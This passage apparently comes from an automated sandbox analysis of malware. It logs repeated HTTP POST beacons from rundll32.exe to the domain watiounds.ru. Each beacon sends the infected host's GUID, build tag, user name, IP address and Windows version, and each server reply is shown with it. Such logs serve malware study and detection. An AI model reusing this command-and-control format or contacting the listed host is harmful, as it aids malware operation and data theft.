                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          55192.168.2.224922095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:49.173530102 CEST97OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:49.298290968 CEST97INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 41 5a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYAZBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          56192.168.2.224922195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:49.635909081 CEST98OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:49.764117002 CEST98INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          57192.168.2.224922295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:50.082720041 CEST99OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:50.206660986 CEST99INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          58192.168.2.224922395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:50.542601109 CEST100OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:50.671019077 CEST100INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBZAYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          59192.168.2.224922495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:51.007761002 CEST101OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:51.130239964 CEST101INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 48 53 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFHSUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.224917195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:17:47.446813107 CEST18OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:17:47.575416088 CEST18INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:17:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAAZZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          60192.168.2.224922595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:51.455270052 CEST102OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:51.578043938 CEST102INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4b 50 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKKPPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          61192.168.2.224922695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:51.904398918 CEST103OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:52.028686047 CEST104INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          62192.168.2.224922795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:52.356420040 CEST104OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:52.478591919 CEST105INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4d 4e 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHMNSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          63192.168.2.224922895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:52.803415060 CEST106OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:52.926666975 CEST106INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          64192.168.2.224922995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:53.247087002 CEST107OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:53.370409966 CEST107INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          65192.168.2.224923095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:53.702891111 CEST108OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:53.826677084 CEST108INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          66192.168.2.224923195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:54.155407906 CEST109OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:54.276946068 CEST109INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHGTSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          67192.168.2.224923295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:54.622772932 CEST110OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:54.754401922 CEST110INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          68192.168.2.224923395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:55.070740938 CEST111OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:55.199376106 CEST111INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKMNPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          69192.168.2.224923495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:55.527024984 CEST112OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:55.652246952 CEST113INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCHSXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.224917295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:18:02.661334038 CEST20OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:02.786098957 CEST21INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJMNQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          70192.168.2.224923595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:55.977261066 CEST113OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
